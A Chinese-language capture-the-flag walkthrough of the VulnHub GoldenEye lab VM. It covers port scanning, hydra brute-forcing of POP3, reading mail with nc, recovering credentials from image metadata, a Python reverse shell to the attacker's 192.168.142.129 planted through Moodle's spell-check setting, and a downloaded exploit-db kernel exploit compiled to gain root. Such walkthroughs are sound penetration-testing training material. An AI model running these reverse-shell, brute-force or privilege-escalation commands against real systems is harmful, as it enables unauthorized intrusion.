GoldenEye

1.参考

It's themed after the great James Bond film (and even better n64 game) GoldenEye.
靶机命名来自詹士邦系列的电影——GoldenEye

nmap详细手册
参考链接
参考链接2

2.复现过程

下载链接:https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova

2.1信息收集

nmap探测端口信息
-n:从不进行DNS解析/始终解析[默认值:有时]
-p-:探测全端口
-v:输出更多详情 写的v越多,越详细。比如-vv -vvv
--reason:输出程序判断一个端口是这个状态的原因
-Pn:将所有主机视为联机-跳过主机发现
-A:启用OS检测,版本检测,脚本扫描和traceroute

开放端口如下:
25——smtp
80——http
55006——ssl加密协议(看了攻略,后续爆破邮箱密码会用到)
55007——pop3

继续收集信息,从80入手,页面提示,访问http://your-ip/sev-home

提示需要登陆,可是没有账号密码,返回页面查看源码

首页的源码里并没有注释,但是google f12发现有一个terminal.js

通过阅读提示信息,获取到用户名是:Boris(这里有一个小坑,basic认证的用户名全是小写的)
密码是html实体编码,可以直接写到html页面进行解码,解码后密码为:InvincibleHack3r

通过刚刚获取的账号密码进行basic认证
账号:boris
密码:InvincibleHack3r
查看源码最下边位置:
合格的Goldeneye网络运营商主管:
Natalya
Boris

源码提示,pop3服务在非常高的端口,也就是55006和55007


黄金眼

goldeneye是苏联或btal的绝密武器项目。由于您有权访问,因此您绝对拥有最高机密许可,并有资格成为经认证的Goldeneye网络运营商(GNO)

请通过电子邮件向合格的GNO主管发送电子邮件,接受在线的Goldeneye操作员培训成为Goldeneye系统的管理员

请记住,由于暗显安全性非常有效,我们已将POP3服务配置为在非常高的非默认端口上运行

2.2漏洞利用

使用上述收集到的信息,初步判断,Natalya和Boris应该是邮箱账号,使用hydra进行账号密码爆破:
(1)hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt -s 55006 -e nsr -t 64 pop3s://192.168.142.128
(2)hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 -e nsr -t 64 -f 192.168.142.128 pop3
使用如上两种方法,我获得了不同的结果,如图可示,更好的是使用了pop3s爆破55006端口,因为本次实验中的pop3似乎不支持-L参数传递用户名字典。

接下来使用nc或者foxmail等连接邮箱的软件,本人抱着参加OSCP考试的目的,所以使用kali中带的nc进行演示

一.登陆并且获取Boris的邮件

二.查看每封邮件内容

一.登陆并且获取Natalya的邮件

二.查看每封邮件内容

其中其中在 “Natalya” 邮件里发现了突破口
获取账号密码
账号:xenia
密码:RCP90rulez!

提示需要修改hosts:
echo -e "192.168.142.128\tsevernaya-station.com" >> /etc/hosts

直接访问:http://severnaya-station.com/gnocertdir/
账号:xenia
密码:RCP90rulez!
登陆后发现有一封邮件,暴露了doak的email name

爆破出账号密码:
账号:doak
密码:goat

获取邮箱密码

发现一个txt文件

提示线索在图片里

下载图片之后有两种方法获取描述信息:
(1)strings for-007.jpg
(2)exiftool for-007.jpg(此方法需要自己apt-get install exiftool)
base64解密:
echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d



根据主页提示以及base64解码,获取账号密码
账号:admin
密码:xWinter1995x!

修改Spell engine

修改aspell为python反弹shell,IP是kali机器的IP:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.142.129",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali本地监听443端口

调用系统的拼写检查功能

getshell

使用python获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
whoami查看权限
uname -a 查看内核

https://www.exploit-db.com/搜索内核版本,第二个为c的提权exp

kali中下载exp:
wget https://www.exploit-db.com/download/37292
靶机没有gcc,修改源码中的gcc为cc

kali利用python搭建http服务:python -m SimpleHTTPServer 80
靶机下载:cd /tmp
wget http://192.168.142.129/37292.c

cc 37292.c -o cc
ls
chmod 777 cc
./cc
whoami

执行如上命令,发现已经是root权限,python获取交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'
查找flag:find / -name *flag*

cat /root/.flag.txt

最后的flag

你可能感兴趣的:(GoldenEye)